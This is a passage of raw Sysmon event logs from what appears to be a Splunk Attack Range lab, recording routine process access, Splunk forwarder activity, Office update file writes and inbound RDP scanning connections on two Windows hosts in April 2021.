14:53:59.347{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.347{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.347{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.347{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.347{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB07-607E-700B-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.347{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB07-607E-700B-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.207{A7A01FEF-EB07-607E-700B-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\OWSHLP10.CHM2021-04-20 14:53:59.315 23542300x800000000000000063579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.112{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93FCEBB273A4BF1D451E1F870EC39092,SHA256=CEAA691673DE866FD9FEF9B50708FD8846B6AA7202BD6E323F74BD1DFBD54E15,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:59.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe2021-04-20 14:53:59.050 23542300x800000000000000049428Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:59.603{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=03D572BF474236FE53548ACC15EC9275,SHA256=9E455365AE85D5C07ADC0B68699C2E02C2731CD74BF387601544DF3F10D1AC87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049427Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:59.415{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED346986EDBE3E23C3116D8A9C7F6A7D,SHA256=28C7F9345460804A8E9AE70A90F435299C92698A550ACCC17EA260F3A7B3D207,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049426Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.649{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52478-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049425Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.488{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60696-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049424Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:59.009{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62917888B3466FA6BD918CD5B0CEFCCB,SHA256=F3BAF245345397D53891F426B20E156BC982254007F9F74B0CCC38BBEC203509,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msmdlocal.dll2021-04-20 14:54:00.925 354300x800000000000000063659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.500{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53095-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.315{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12923-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.127{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-15653-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:59.106{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57480-false10.0.1.12-8000- 354300x800000000000000063655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:58.762{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57479-false10.0.1.12-8089- 11241100x800000000000000063654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msmdlocal.dll2021-04-20 14:54:00.800 11241100x800000000000000063653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\TextIntelligence.dll2021-04-20 14:54:00.753 11241100x800000000000000063652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.706{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOIDCLIL.DLL2021-04-20 14:54:00.706 11241100x800000000000000063651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.644{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOIDRES.DLL2021-04-20 14:54:00.644 11241100x800000000000000063650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.644{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSORES.DLL2021-04-20 14:54:00.644 10341000x800000000000000063649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.612{A7A01FEF-EB08-607E-710B-00000000BB01}31846244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.597{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3539C3017521706E21A8B46C59657812,SHA256=8C745A142E664481A57C963377C867E16E093AD35362A1F64A0EC52C7AB276CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.597{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=531620A93E1141215BE3E0BE7B11B6C5,SHA256=86945343A270ACC708DC0A5CFA5EFF746F4EFD18FABD61E45E2DAD6B817C2270,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso98win32client.dll2021-04-20 14:54:00.581 11241100x800000000000000063645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\FPWEC.DLL2021-04-20 14:54:00.550 11241100x800000000000000063644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmsrv_xl.dll2021-04-20 14:54:00.534 11241100x800000000000000063643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmpersistence_xl.dll2021-04-20 14:54:00.472 11241100x800000000000000063642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msmdlocal_xl.dll2021-04-20 14:54:00.472 10341000x800000000000000063641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.440{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB08-607E-710B-00000000BB01}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.425{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB08-607E-710B-00000000BB01}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.425{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB08-607E-710B-00000000BB01}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:00.285{A7A01FEF-EB08-607E-710B-00000000BB01}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 